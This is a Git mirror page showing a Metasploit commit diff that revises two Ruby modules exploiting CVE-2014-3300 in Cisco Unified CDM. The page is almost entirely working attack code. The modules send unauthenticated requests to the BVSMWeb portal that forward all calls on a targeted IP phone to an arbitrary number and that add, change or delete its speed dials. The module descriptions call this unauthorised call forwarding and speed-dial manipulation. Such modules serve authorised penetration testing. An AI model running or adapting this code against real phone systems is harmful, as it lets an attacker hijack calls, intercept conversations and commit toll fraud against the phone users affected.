infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

First revision of the Viproy CUCDM exploits

bug/bundler_fix
Fatih Ozavci 2014-10-28 13:53:13 +11:00
parent 1db09fee01
commit 703393e9f1
2 changed files with 78 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
modules/auxiliary/voip/viproy_cucdm_callforward.rb
View File

@ -15,28 +15,42 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Version' => '1',
'Description' => %q{
CUCDM IP Phone XML Services - Call Forwarding Tool
This tool can be tested with the voss-xmlservice component of Viproy.
https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
in Unified CDM Application Software before 10 does not properly implement access control,
which allows remote attackers to modify user information. This vulnerability can be exploited
for unauthorised call forwarding using this module. This tool can be tested with the fake
voss-xmlservice component of Viproy.
},
'Author' => 'Fatih Ozavci <viproy.com/fozavci>',
'References' =>
'References' =>
[
['CVE', 'CVE-2014-3300'],
['CVE', '2014-3300'],
['BID', '68331'],
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'FORWARD', {
'Description' => 'Enabling the call forwarding for the MAC address.'
} ],
[ 'INFO', {
'Description' => 'Retrieving the call forwarding information for the MAC address.'
} ],
[ 'list', {
'Description' => 'List the actions that would be started'
} ]
],
'DefaultAction' => 'INFO'
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']),
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']),
], self.class)
end
@ -44,21 +58,21 @@ class Metasploit3 < Msf::Auxiliary
def run
uri = normalize_uri(target_uri.to_s)
mac = Rex::Text.uri_encode(datastore["MAC"])
forwardto = Rex::Text.uri_encode(datastore["FORWARDTO"])
forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"])
print_status("Getting fintnumbers and display names of the IP phone")
uri_show=uri+"/showcallfwd.cgi?device=SEP#{mac}"
uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}")
vprint_status("URL: "+uri_show)
res = send_request_cgi(
{
'uri' => uri_show,
'method' => 'GET',
}, 20)
})
if (res and res.code == 200 and res.body =~ /fintnumber/)
if res and res.code == 200 and res.body =~ /fintnumber/
doc = REXML::Document.new(res.body)
lines=[]
fintnumbers=[]
@ -72,29 +86,31 @@ class Metasploit3 < Msf::Auxiliary
}
lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])}
# for a specific FINTNUMBER redirection
fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]
if datastore["ACTION"] == "FORWARD"
if action.name.upcase == "FORWARD"
fintnumbers.each {|fintnumber|
print_status("Sending call forward request for #{fintnumber}")
uri_fwd=uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forwardto}"
uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}")
vprint_status("URL: "+uri_fwd)
res = send_request_cgi(
{
'uri' => uri_fwd,
'method' => 'GET',
}, 20)
})
uri_fwdpln=uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}"
uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}")
vprint_status("URL: "+uri_fwdpln)
res = send_request_cgi(
{
'uri' => uri_fwdpln,
'method' => 'GET',
}, 20)
})
if (res.body.to_s =~ /CFA/)
if res and res.body and res.body.to_s =~ /CFA/
print_good("Call forwarded successfully for #{fintnumber}")
else
print_status("Call forward failed.")

65
modules/auxiliary/voip/viproy_cucdm_speeddials.rb
View File

@ -13,19 +13,40 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
'Version' => '1',
'Description' => %q{
CUCDM IP Phone XML Services - Speed Dial Attack Tool
This tool can be tested with the voss-xmlservice component of Viproy.
https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
in Unified CDM Application Software before 10 does not properly implement access control,
which allows remote attackers to modify user information. This vulnerability can be exploited
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
voss-xmlservice component of Viproy.
},
'Author' => 'Fatih Ozavci <viproy.com/fozavci>',
'References' =>
[
['CVE', 'CVE-2014-3300'],
['CVE', '2014-3300'],
['BID', '68331'],
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'GET', {
'Description' => 'Getting the speeddials for the MAC address.'
} ],
[ 'MODIFY', {
'Description' => 'Modifying a speeddial for the MAC address.'
} ],
[ 'ADD', {
'Description' => 'Adding a speeddial for the MAC address.'
} ],
[ 'DELETE', {
'Description' => 'Deleting a speeddial for the MAC address.'
} ],
[ 'list', {
'Description' => 'List the actions that would be started'
} ]
],
'DefaultAction' => 'GET'
)
register_options(
@ -33,7 +54,6 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('ACTION', [ true, 'Speed Dials Action: LIST|MODIFY|ADD|DELETE', 'LIST']),
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
@ -48,19 +68,19 @@ class Metasploit3 < Msf::Auxiliary
telno = Rex::Text.uri_encode(datastore["TELNO"])
case datastore["ACTION"].upcase
case action.name.upcase
when 'MODIFY'
print_status("Deleting Speed Dial of the IP phone")
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
print_good("Speed Dial #{position} is deleted successfully")
print_status("Adding Speed Dial to the IP phone")
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Added/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
print_good("Speed Dial #{position} is added successfully")
elsif res.body =~ /exist/
print_error("Speed Dial is exist, change the position or choose modify!")
@ -74,8 +94,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Deleting Speed Dial of the IP phone")
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
print_good("Speed Dial #{position} is deleted successfully")
else
print_error("Speed Dial is not found!")
@ -84,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Adding Speed Dial to the IP phone")
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Added/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
print_good("Speed Dial #{position} is added successfully")
elsif res.body =~ /exist/
print_error("Speed Dial is exist, change the position or choose modify!")
@ -97,23 +117,24 @@ class Metasploit3 < Msf::Auxiliary
url=uri+"/speeddials.cgi?device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
parse(res) if res != Exploit::CheckCode::Safe
status,res=send_rcv(url)
parse(res) if status != Exploit::CheckCode::Safe
end
end
def send_rcv(uri)
uri=normalize_uri(uri.to_s)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
}, 20)
if (res and res.code == 200 and res.body =~ /Speed [D|d]ial/)
return res
})
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
return Exploit::CheckCode::Vulnerable,res
else
print_error("Target appears not vulnerable!")
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe,res
end
end